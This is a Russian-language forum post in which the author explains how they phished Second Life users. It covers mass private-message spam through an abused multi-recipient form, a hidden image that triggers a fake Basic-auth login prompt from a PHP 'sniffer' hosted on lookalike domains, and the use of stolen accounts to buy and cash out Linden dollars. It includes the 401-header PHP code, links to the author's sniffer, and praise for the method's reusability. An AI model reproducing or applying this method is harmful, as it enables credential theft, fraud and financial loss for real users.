Warn! Статья рассматривает довольно стерильный случай, который к тому же закончился неудачей.
Интерес представляет скорее не конкретный сайт, а методика поиска и мышления, в поиске игрового сайта, которым можно поживится.
Интерес представляет скорее не конкретный сайт, а методика поиска и мышления, в поиске игрового сайта, которым можно поживится.
Итак. есть сайт secondlife.com.
Цель сайта - создание функциональной альтернативной реальности (тоесть на нем собираются трансы, извращенцы, фури, и просто педики))
Главное что нас интересует - на нем есть возможность ебатцавывода заработаных денег.
Уже интересно.
Лезем в аккаунт, и паралельно в гогл.
Русское сообщество sl говорит что схема внесения денег следующая - прикрепляем сс или палку, и дальше перечисляем на акаунт инстантом (тоесть, фактически в кредит линденам). Хорошо.
А что с выводом? часа 4 гогла вывели на сайт
//dreamland.anshechung.com/index.php?fct=SELL_L$ Значит не все безнадежно.
Пробуем прицепить сс к акаунту (вот тут хоть убейте - ну не цепляется и все.) - хрен с ним, отложили. Будем иметь чужие аки.
Ищем что сайт при себе имеет. А имеет он свеженькую еву неизвестной модели (адская помесь жабы, форума, и их внутреннего месенжера) И в ней разрешен хтмл, притом почти весь ( режется только жс, ифрейм, стили).
Идем в раздел "личные сообщения", видим что в поле получателей можно вбивать несколько людей, и что все криво зааякшено. Фаербагом ловим форму:
Code:
Parameters:
body <body><p><strong>yah!</strong></p></body>
doPost Send Message
subject test
[B]to 132075,44347[/B]
Source
Content-Type: application/x-www-form-urlencoded
Content-Length: 129в одну строчку генерим первые 500шт на пробу (от 5к до 5500, чтобы нидайбог, не задеть админов)
тыкаем "сенд", и вуаля, пошешрав немного, сервер выдал "отправлено",
*тут подмечу, что всего айдишников я нашел 140к, несмотря на то что в википедии обещано лимон регистраций. И когда на скрипт мейлера я зарядил ряд в 2к номеров - сервер просто упал, и продолжал я уже на следующий день.
Чтобы не запариваться с фильтрацией реферера и юзерагента, да еще и не имея деда с пхп, сокетами\курлом, был накатан .js для оперы, котрый зам заполнял форму, сабмитил, убивал фрейм, создавал новый.
Разумеется, все прекрасно работало с моей машины, через проксю, и что примечательно, скушало всего мегабайт трафика, за всю рассылку.
Чем спамил то?
Есть такая бородатая фича. если у документа\файла\картинки отправить вместо нормального хедера
вот такой:
PHP:
header("WWW-Authenticate: Basic realm=\"".$message."\"");
header("HTTP/1.0 401 Unauthorized");Соответственно рассылаем наш php-снифф, кторый отдает 401й хедер.
Такаем его в лс просто как картинку.
Разрешенный хтмл давал лишь одну полезность - скрыть картинку атрибутом display:none.
Как обставлял, чтобы клюнули?
Да ничего хитрого... Красиво пишем заголовок "приватное сообщени", рядом картинка замочка, далее в рамочке текст
все максимально подробно. юзерам нравится забота)
В заголовке выскакивающего окна все нормальные браузеры пишут адрес сервера. для этой цели были регнуты secondllfe.com и secondlife-secure.com на данные хуиза вточности, а как оригинал, на них и закинул сниферы.
Чтобы окошко не долбило юзера после ввода логина и пароля - как только он что-то введет - выдаем ему фирменные кукисы).
Итак, с лс разобрались. Что делаем когда получили логин и пароль?
идем в кабинет юзера, покупаем линденов, перекиываем их себе на акк (а лучше не себе, а на соседний, куда прикрепим свою палку)
потом ползем в контору по ссылке выше, и подаем заявку на обнал.
Вот собственно и вся сястема)
Что было на самом деле:
Суток 5 я тупо ковырял сайт во все дырки, ничего полезного не выковырял, режется все к чертям.
В первый вечер спама я отправил 1+к личных сообщений, после чего уронил мессинг-сервер. с пришедших 14 акаунтов я перевел линдены на еще пару, и подал заякуна обналичивание.
Вобщем только их я обналичить и успел. вышло всего 120$, ну чтоже и так неплохо.
На следующий день. когда я проспамил отстаток, я всетаки задел пару админов, и на форуме поднялась волна говна и стонов. через полчаса после первой темы (через 10 минут после завершения рассылки) отключили лс, через 2 часа всем рефрешнули пароли.
Лс включили дня 3 назад (месяц ничего не работало), еще не смотрел что поменяли.
На этом история победного спамера закончилась, но несовсем)
у меня остались домены, а у форума осталась функция "уведомить о теме на имеил", а такимиже опциями ( бесконечно получателей, хтмл в теме), но письмо уже шло на имеил, а туда годился только тупой фейк-фишинг.
Подведу итоги:
- Описаным методом можно тянуть акаунты почти везде, где можно вставить картинку с http:. Метод стар как мой дом, но еще работает, и надежно)
- Расходы - 120р на 3 литра апельсинового сока, выпитого за это время, еще 500 на домены.
- Доходы - 120$, говно, но могло быть и лучше.
- Степень риска - потерять домены. Уменьшить степень риска - купить абузоустойчивые домены в 8 раз дороже, а учитывая, что контента никакого вообще нет(только запароленый скрипт), то абузить не на что.
- Время - в общей сумме неделя. полезно потраченого (не на багопоиск) двое суток.
- Мне почти не пригодились мои "хако-прогерские" знания, поскольку сервер по сути затронут не был, метод может использовать любой "новичек" (блин, боюсь этого слова))
Code:
//home.xml.in/elaevi_.htmlКопия снифака, бросал на скорую руку, но мб вам понравится, сорец одним файлом могу выкинуть, он крохотный, но умеет все что нужно.
Code:
//home.xml.in/?do=showИ собственно, вот рисунок, который вызвал всплывшее в при загрузке окошко:
Code:
http://home.xml.in/?url=img.gifКак видите, и тут работает, можно отбирать акаунты у школоты.
Простите за сумбурность оформления, я не копирайтер,
мелкое доение secondlife и ныне актуально, у кого получится скардить без холда - буду рад. Наверное у меня просто карма квадратная)
"А против крокодилов в канализации у нас свои методы"..
(с) Aels. хотя я сомневаюсь что эта статья представляет такую уж ценность.
зы. тоже хочу атм-ку, хотя негоже покупать бумажник, если класть нечего.
Last edited by a moderator:
еще раз сорри
